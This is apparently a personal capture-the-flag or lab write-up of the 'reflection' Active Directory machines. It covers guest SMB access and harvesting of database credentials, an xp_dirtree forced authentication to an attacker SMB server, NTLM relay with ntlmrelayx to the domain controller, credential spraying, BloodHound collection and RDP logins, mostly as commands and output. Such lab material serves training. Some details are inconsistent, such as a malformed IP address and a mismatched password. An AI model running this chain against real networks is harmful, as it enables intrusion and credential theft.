reflection - writeup - Konstantinovitz

## Initial Network Scan - **Domain:** `reflection.v1` - **Machines** - DC01 - MS01 - There's a third which I cannot connect to directly?? - Is likely reachable from MS01 ## Remote Service Enumeration ### `DC01` - SMB - [[MSSQL]] - 445 ### `MS01` - SMB - null -> permitted - shares -> denied - `guest` -> permitted - shares -> permitte - `staging` -> `READ` - [[MSSQL]] - 1433 - [[WinRM - 5986 HTTP]] - MS Terminal Services - 3389 ## Accessing `staging` share as `guest` ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54] ╰─> smbclient //$RHOST/staging -U guest Password for [WORKGROUP\guest]: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jun 7 17:42:48 2023 .. D 0 Wed Jun 7 17:41:25 2023 staging_db.conf A 50 Thu Jun 8 11:21:49 2023 6261245 blocks of size 4096. 1169804 blocks available smb: \> get staging_db.conf getting file \staging_db.conf of size 50 as staging_db.conf (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54] ╰─> cat staging_db.conf user=web_staging password=Washroom510 db=staging ``` Few things these credentials could be: - Rabbit hole - Spray credentials -> no results - For the [[MSSQL]] database at port`1433` -> success ```sh ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54] ╰─> nxc mssql $RHOST -u ../users.txt -p ../passwords.txt --local-auth MSSQL 10.10.149.54 1433 MS01 [*] Windows Server 2022 Build 20348 (name:MS01) (domain:reflection.vl) MSSQL 10.10.149.54 1433 MS01 [+] MS01\web_staging:Washroom510 ``` ## Dumping [[MSSQL]] database I'll initially attempt `xp_cmdshell` to see if I can get a shell: ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54] ╰─> sqlcmd -S $RHOST -U web_staging -P Washroom510 1> exec xp_cmdshell 'whoami'; 2> go Msg 229, Level 14, State 5, Server MS01\SQLEXPRESS, Procedure xp_cmdshell, Line 1 The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. 1> 2> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; 3> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; 4> EXEC xp_cmdshell 'whoami'; 5> go Msg 15247, Level 16, State 1, Server MS01\SQLEXPRESS, Procedure sp_configure, Line 105 User does not have permission to perform this action. ``` So no love for `xp_cmdshell` :-( ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/MS01]-[10.10.149.54] ╰─> sqlcmd -S $RHOST -U web_staging -P Washroom510 1> select name from sys.databases; 2> go name -------------------------------------------------------------------------------------------------------------------------------- master tempdb model msdb staging (5 rows affected) 1> use staging; 2> go Changed database context to 'staging'. 1> select name from sys.tables; 2> go name -------------------------------------------------------------------------------------------------------------------------------- users (1 rows affected) 1> select * from users; 2> go id username password ----------- -------------------------------------------------- -------------------------------------------------- 1 dev01 Initial123 2 dev02 Initial123 ``` We got the following credentials: ``` dev01:Initial123 dev02:Initial123 ``` We attempt to spray them: - password spray - MSSQL -> no love - SMB -> nothing They seem so generic and weak that they could well be a rabbit hole. Had to have a little looksie at the writeup here... ## `xp_dirtree` Relay Attack So turns out that I'm able to run `xp_dirtree` which enables me to connect back to an SMB share running on my attacker machine. The share is setup in the following manner: ```sh # on attacker machine smbserver.py -ip $(get-ip tun1) -smb2support share . ``` We then run the `xp_dirtree` command in [[MSSQL]] which makes the underlying OS reach out to our SMB share with an NTLMv2 authentication hash: ```sql -- inside the sqlcmd shell exec xp_dirtree '\\10.8.6.6.67\share\',1,1; go ``` Upon execution the SMB server logs the NTLMv2 hash: ``` [*] Incoming connection (10.10.156.230,61367) [*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01) [*] User MS01\svc_web_staging authenticated successfully [*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:1290bff29b760499b4dc77f46d510417:01010000000000008042bfe28abadb0152ff0a3627a3104f000000000100100063004400670044007a007000760066000300100063004400670044007a007000760066000200100063004e0044006a0048007300730072000400100063004e0044006a004800730073007200070008008042bfe28abadb010600040002000000080030003000000000000000000000000030000035a8d85f3dca87eb172b9249a71c181ac0efeaf744d39cd6984735023f9ec8cd0a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0036002e00360037000000000000000000 ``` We've now go an `NTLMv2` hash which we may attempt to leverage in a relay attack. This time around we'll run `ntlmrelayx` and attempt to relay the authentication hash to the `DC01` machine: ``` ntlmrelayx.py --no-http-server -smb2support -t $DC01-IP -i ``` We re-run the `xp_dirtree` commands to re-trigger authentication. This makes our `ntlmrelayx` session yield the following: ``` [*] Servers started, waiting for connections [*] Setting up RAW Server on port 6666 [*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.156.230, attacking target smb://10.10.156.229 [*] Authenticating against smb://10.10.156.229 as REFLECTION/SVC_WEB_STAGING SUCCEED [*] Started interactive SMB client shell via TCP on 127.0.0.1:11000 [*] All targets processed! ``` We can now leverage netcat to connect to the interactive SMB client shell which was spawned: ```sh nc 127.0.0.1 11000 ``` ``` # shares ADMIN$ C$ IPC$ NETLOGON prod SYSVOL # use prod # ls drw-rw-rw- 0 Wed Jun 7 17:44:26 2023 . drw-rw-rw- 0 Wed Jun 7 17:43:22 2023 .. -rw-rw-rw- 45 Thu Jun 8 11:24:39 2023 prod_db.conf # get prod_db.conf ``` ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection]-[] ╰─> cat prod_db.conf user=web_prod password=Tribesman201 db=prod# ``` Okay that was a freaking mouthful... Let's attempt to spray those around: - SMB -> nada - [[MSSQL]] - `--local-auth` - We get a hit for `web_prod:Tribesman201` on `DC01` ## `DC01` [[MSSQL]] As `web_prod` ```sh ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection]-[] ╰─> sqlcmd -S $DC01_IP -U web_prod -P Tribesman201 ``` ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection]-[] ╰─> sqlcmd -S $DC01_IP -U web_prod -P Tribesman201 1> exec xp_cmdshell 'whoami'; 2> go Msg 229, Level 14, State 5, Server DC01\SQLEXPRESS, Procedure xp_cmdshell, Line 1 The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'. 1> select name from sys.databases; 2> go name -------------------------------------------------------------------------------------------------------------------------------- master tempdb model msdb prod (5 rows affected) 1> use prod; 2> go Changed database context to 'prod'. 1> select name from sys.tables; 2> go name -------------------------------------------------------------------------------------------------------------------------------- users (1 rows affected) 1> select * from users; 2> go id name password ----------- -------------------------------------------------- -------------------------------------------------- 1 abbie.smith CMe1x+nlRaaWEw 2 dorothy.rose hC_fny3OK9glSJ ``` So once again we get some credz: - `abbie.smith:CMe1x+nlRaaWEw` - `dorothy.rose:hC_fny3OK9glSJ` I'll attempt to spray them: - SMB -> - `abbie.smith:CMe1x+nlRaaWEw` on `DC01` and `MS01` - `dorothy.rose:hC_fny3OK9glSJ` on `DC01` and `MS01` - MSSQL Windows Auth -> Success - `abbie.smith:CMe1x+nlRaaWEw` on `DC01` and `MS01` - `dorothy.rose:hC_fny3OK9glSJ` on `DC01` and `MS01` - `WinRM` -> no love - `RDP` -> yeeeeiz - `dorothy.rose:hC_fny3OK9glSJ` on `DC01` and `MS01` - `abbie.smith:CMe1x+nlRaaWEw` on `DC01` and `MS01` Seems we got us some real user accounts here <3. We'll go ahead and connect as each user, enumerate rinse and repeat. ## Authenticated External Access - `dorothy.rose` `dorothy.rose:hC_fny4OK9glSJ` Let's do some bloodhound fuckery and see what we got. ``` ╭─[λ]-[noctua.konstantinovitz.com]-[/targets/reflection/dorothy.rose]-[] ╰─> bloodhound-ce-python -u $USER -p $PASS -d reflection.vl -ns $DC01_IP --dns-tcp -c all ``` ## `DC01` Via RDP As `abbie.smith` ``` nxc rdp $DC01_IP -u 'dorothy.rose' -p 'hC_fny3OK9glSJ' ``` ``` xfreerdp /u:dorothy.rose /p:hC_fny3OK9glSJ /v:10.10.209.101 xfreerdp /u:abbie.smith /p:CMe1x+nlRaaWEw /v:10.10.209.101 ```